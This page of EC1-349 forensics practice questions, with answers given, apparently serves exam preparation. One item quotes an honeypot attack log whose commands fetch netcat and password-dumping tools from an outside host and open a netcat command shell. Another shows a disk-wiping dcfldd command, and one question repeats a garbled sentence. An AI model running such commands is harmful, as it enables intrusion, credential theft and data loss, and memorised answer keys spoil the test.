EC-COUNCIL EC1-349 Online Practice Questions and Exam Preparation

EC-COUNCIL EC1-349 Online Questions & Answers

• Question 161:

  Which of the following is not a part of the technical specification of the laboratory-based imaging system?

  A. High performance workstation PC
  B. Remote preview and imaging pod
  C. Anti-repudiation techniques
  D. very low image capture rate
  D. very low image capture rate

• Question 162:

  A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?

  A. Searching for evidence themselves would not have any ill effects
  B. Searching could possibly crash the machine or device
  C. Searching creates cache files, which would hinder the investigation
  D. Searching can change date/time stamps
  D. Searching can change date/time stamps

• Question 163:

  Wireless access control attacks aim to penetrate a network by evading WLAN access control measures, such as AP MAC filters and Wi-Fi port access controls.

  Which of the following wireless access control attacks allows the attacker to set up a rogue access point outside the corporate perimeter, and then lure the employees of the organization to connect to it?

  A. War driving
  B. Rogue access points
  C. MAC spoofing
  D. Client mis-association
  D. Client mis-association

• Question 164:

  Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would the following command accomplish? dcfldd if=/dev/zero of=/dev/hda bs=4096 conv=noerror, sync

  A. Fill the disk with zeros
  B. Low-level format
  C. Fill the disk with 4096 zeros
  D. Copy files from the master disk to the slave disk on the secondary IDE controller
  A. Fill the disk with zeros

• Question 165:

  The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

  He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

  "cmd1.exe /c open 213.116.251.162 >ftpcom"

  "cmd1.exe /c echo johna2k >>ftpcom"

  "cmd1.exe /c echo haxedj00 >>ftpcom"

  "cmd1.exe /c echo get nc.exe >>ftpcom"

  "cmd1.exe /c echo get pdump.exe >>ftpcom"

  "cmd1.exe /c echo get samdump.dll >>ftpcom"

  "cmd1.exe /c echo quit >>ftpcom"

  "cmd1.exe /c ftp -s:ftpcom"

  "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

  What can you infer from the exploit given?

  A. It is a local exploit where the attacker logs in using username johna2k
  B. There are two attackers on the system ?johna2k and haxedj00
  C. The attack is a remote exploit and the hacker downloads three files
  D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
  C. The attack is a remote exploit and the hacker downloads three files

• Question 166:

  To calculate the number of bytes on a disk, the formula is: CHS**

  A. number of circles x number of halves x number of sides x 512 bytes per sector
  B. number of cylinders x number of halves x number of shims x 512 bytes per sector
  C. number of cells x number of heads x number of sides x 512 bytes per sector
  D. number of cylinders x number of heads x number of sides x 512 bytes per sector
  D. number of cylinders x number of heads x number of sides x 512 bytes per sector

• Question 167:

  John is working as a computer forensics investigator for a consulting firm in Canada. He is called to seize a computer at a local web caf?John is working as a computer forensics investigator for a consulting firm in Canada. He is called to seize a computer at a local web caf purportedly used as a botnet server. John thoroughly scans the computer and finds nothing that would lead him to think the computer was a botnet server. John decides to scan the virtual memory of the computer to possibly find something he had missed. What information will the virtual memory scan produce?

  A. It contains the times and dates of when the system was last patched
  B. It is not necessary to scan the virtual memory of a computer
  C. It contains the times and dates of all the system files
  D. Hidden running processes
  D. Hidden running processes

• Question 168:

  What is the target host IP in the following command? C:\> firewalk -F 80 10.10.150.1 172.16.28.95 -p UDP

  A. 10.10.150.1
  B. This command is using FIN packets, which cannot scan target hosts
  C. Firewalk does not scan target hosts
  D. 172.16.28.95
  D. 172.16.28.95

• Question 169:

  While presenting his case to the court, Simon calls many witnesses to the stand to testify. Simon decides to call Hillary Taft, a lay witness, to the stand. Since Hillary is a lay witness, what field would she be considered an expert in?

  A. Technical material related to forensics
  B. No particular field
  C. Judging the character of defendants/victims
  D. Legal issues
  B. No particular field

• Question 170:

  Raw data acquisition format creates ____________of a data set or suspect drive.

  A. Simple sequential flat files
  B. Segmented files
  C. Compressed image files
  D. Segmented image files
  A. Simple sequential flat files